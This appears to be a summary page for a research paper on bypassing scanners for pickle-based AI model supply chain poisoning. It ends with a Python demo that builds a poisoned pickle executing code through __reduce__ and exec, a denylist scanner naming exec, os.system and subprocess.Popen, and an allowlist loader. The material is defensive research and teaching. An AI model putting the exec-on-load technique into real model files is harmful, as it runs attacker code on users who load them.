The Art of Hide and Seek: Making Pickle-Based Model Supply Chain Poisoning Stealthy Again
Tong Liu 1,2, Guozhu Meng 1,2, Peng Zhou 3, Zizhuang Deng 4, Shuaiyin Yao 1,2, Kai Chen 1,2
Published on arXiv
2508.19774
AI Supply Chain Attacks
OWASP ML Top 10 — ML06
Key Finding
Achieves ~100% scanner bypass rate across 133 discovered gadgets, and 89% bypass rate even against the best-performing SOTA scanner, earning a $6000 bug bounty upon responsible disclosure.
Exception-Oriented Programming (EOP)
Novel technique introduced
Pickle deserialization vulnerabilities have persisted throughout Python's history, remaining widely recognized yet unresolved. Due to its ability to transparently save and restore complex objects into byte streams, many AI/ML frameworks continue to adopt pickle as the model serialization protocol despite its inherent risks. As the open-source model ecosystem grows, model-sharing platforms such as Hugging Face have attracted massive participation, significantly amplifying the real-world risks of pickle exploitation and opening new avenues for model supply chain poisoning. Although several state-of-the-art scanners have been developed to detect poisoned models, their incomplete understanding of the poisoning surface leaves the detection logic fragile and allows attackers to bypass them. In this work, we present the first systematic disclosure of the pickle-based model poisoning surface from both model loading and risky function perspectives. Our research demonstrates how pickle-based model poisoning can remain stealthy and highlights critical gaps in current scanning solutions. On the model loading surface, we identify 22 distinct pickle-based model loading paths across five foundational AI/ML frameworks, 19 of which are entirely missed by existing scanners. We further develop a bypass technique named Exception-Oriented Programming (EOP) and discover 9 EOP instances, 7 of which can bypass all scanners. On the risky function surface, we discover 133 exploitable gadgets, achieving almost a 100% bypass rate. Even against the best-performing scanner, these gadgets maintain an 89% bypass rate. By systematically revealing the pickle-based model poisoning surface, we achieve practical and robust bypasses against real-world scanners. We responsibly disclose our findings to corresponding vendors, receiving acknowledgments and a $6000 bug bounty.
Key Contributions
- Identifies 22 distinct pickle-based model loading paths across 5 ML frameworks, with 19 entirely missed by existing scanners
- Develops Exception-Oriented Programming (EOP), a novel bypass technique with 9 instances of which 7 evade all SOTA scanners
- Discovers 133 exploitable gadgets achieving near-100% bypass rate against existing model security scanners (89% against the best-performing scanner)
🛡️ Threat Analysis
The paper is squarely about the AI model supply chain: malicious pickle payloads embedded in model files distributed via Hugging Face and other model-sharing platforms. Because unpickling resolves and calls whatever globals the byte stream names, the payload runs as soon as a victim loads the model, before any weights are touched. The core contribution is enumerating the poisoning surface (which framework code paths unpickle attacker-controlled bytes, and which importable functions serve as gadgets) and showing that the static scanners meant to catch poisoned files before they are loaded can be bypassed. The attack vector is the distribution ecosystem, not weight-level backdoor injection.
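To make the mechanism concrete, the following is an added example written for this page; it is not code from the paper or from any scanner it evaluates. It builds a constructed pickle whose `__reduce__` hands the loader `builtins.exec` with a harmless payload, walks the opcode stream the way a static scanner must (with a deliberately small denylist, the kind of incomplete list the paper shows is fragile), and contrasts that with a fail-closed allowlist in an `Unpickler.find_class` override. The class and function names, the denylist and allowlist contents, and the sample "weights" dictionary are all assumptions made for the demo.

```python
import io
import os
import pickle
import pickletools


class PoisonedModel:
    """Hypothetical stand-in for a serialized model object. pickle stores the
    result of __reduce__: a callable plus its arguments. The loader resolves
    the callable by name and calls it during load, before any framework code
    sees the returned object. The payload is deliberately harmless: it only
    sets an environment variable so the effect can be observed."""

    def __reduce__(self):
        return (exec, ("import os; os.environ['PICKLE_DEMO'] = 'executed'",))


def make_poisoned_pickle() -> bytes:
    return pickle.dumps(PoisonedModel())


def make_benign_pickle() -> bytes:
    # Constructed 'weights': plain containers only, so no GLOBAL/REDUCE opcodes.
    return pickle.dumps({"layer.0.weight": [0.1, 0.2, 0.3], "epochs": 3})


# Static scanning: read the opcode stream, never execute it.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}

# Assumed denylist. Real scanners carry longer lists, but any such list only
# catches gadgets it already knows about.
RISKY_GLOBALS = {
    ("builtins", "exec"), ("builtins", "eval"), ("builtins", "__import__"),
    ("os", "system"), ("posix", "system"), ("subprocess", "Popen"),
}


def scan_globals(data: bytes) -> list[tuple[str, str]]:
    """Return every (module, name) the pickle would import. Handles GLOBAL
    (protocols 0-3) and STACK_GLOBAL (protocol 4+), tracking only the string
    pushes and memo slots needed to recover the two name operands."""
    imports, strings, memo, last = [], [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            imports.append((module, name))
            last = None
        elif op.name == "STACK_GLOBAL":
            name = strings.pop() if strings else None
            module = strings.pop() if strings else None
            imports.append((module, name))
            last = None
        elif op.name in STRING_OPS:
            strings.append(arg)
            last = arg
        elif op.name == "MEMOIZE":
            memo[len(memo)] = last
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            last = memo.get(arg)
            if last is not None:
                strings.append(last)
        else:
            last = None
    return imports


def find_risky(data: bytes) -> list[tuple[str, str]]:
    return [g for g in scan_globals(data) if g in RISKY_GLOBALS]


class AllowlistUnpickler(pickle.Unpickler):
    """Fail closed: any global not explicitly allowed is refused, whatever
    opcode sequence produced it. Loading still means executing the stream,
    so this is a last line of defence, not a replacement for a format that
    does not execute code on load."""
    ALLOWED = {("collections", "OrderedDict")}  # assumed; extend per framework

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused global {module}.{name}")


def safe_load(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


def demo() -> dict:
    poisoned, benign = make_poisoned_pickle(), make_benign_pickle()
    results = {
        "scanner_flags_poisoned": find_risky(poisoned),
        "scanner_flags_benign": find_risky(benign),
        "benign_loads": safe_load(benign),
    }
    try:
        safe_load(poisoned)
        results["allowlist_blocked"] = False
    except pickle.UnpicklingError:
        results["allowlist_blocked"] = True
    # The stock loader runs the payload as a side effect of loading.
    os.environ.pop("PICKLE_DEMO", None)
    pickle.loads(poisoned)
    results["payload_ran"] = os.environ.get("PICKLE_DEMO") == "executed"
    return results
```

Running `demo()` shows the two halves of the paper's argument side by side: the denylist scanner flags `builtins.exec` only because that name is on its list, and a loader path that reaches `pickle.loads` executes the payload regardless of what any scanner reported. The allowlist unpickler blocks the same stream without knowing the gadget, which is why load-time allowlisting (or a serialization format that cannot call code) is the control to pair with scanning rather than scanning alone.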